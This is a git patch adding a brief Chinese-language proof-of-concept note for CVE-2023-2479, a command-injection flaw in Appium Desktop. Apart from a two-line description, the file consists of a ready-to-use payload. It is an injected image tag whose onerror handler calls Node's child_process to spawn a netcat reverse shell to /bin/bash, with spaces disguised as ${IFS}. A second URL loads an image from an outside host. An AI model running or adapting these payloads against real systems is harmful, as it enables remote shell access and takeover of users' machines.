From 2e37608631b007d128a4b84f126811da30d63ca1 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 22 Nov 2023 17:03:46 +0800
Subject: [PATCH] =?UTF-8?q?Create=20Appium=20Desktop=20CVE-2023-2479?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Appium Desktop CVE-2023-2479漏洞.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 Appium Desktop CVE-2023-2479漏洞.md

diff --git a/Appium Desktop CVE-2023-2479漏洞.md b/Appium Desktop CVE-2023-2479漏洞.md
new file mode 100644
index 0000000..25833e2
--- /dev/null
+++ b/Appium Desktop CVE-2023-2479漏洞.md	
@@ -0,0 +1,14 @@
+## Appium Desktop CVE-2023-2479漏洞
+
+appium-desktop 是 Appium 服务器的图形界面，也是一个应用程序检查器
+
+由于用户输入审查不当，此软件包的受影响版本容易受到命令注入的攻击，允许攻击者设置反向 shell。
+
+
+## poc
+```
+http://127.0.0.1/?xss=<img/src="1"/onerror=eval("require('child_process').exec('nc${IFS}localhost${IFS}4444${IFS}-e${IFS}/bin/bash');");>
+
+http://127.0.0.1/?url=<img/src="http://nbjfpetfmu.dgrh3.cn"> 
+
+```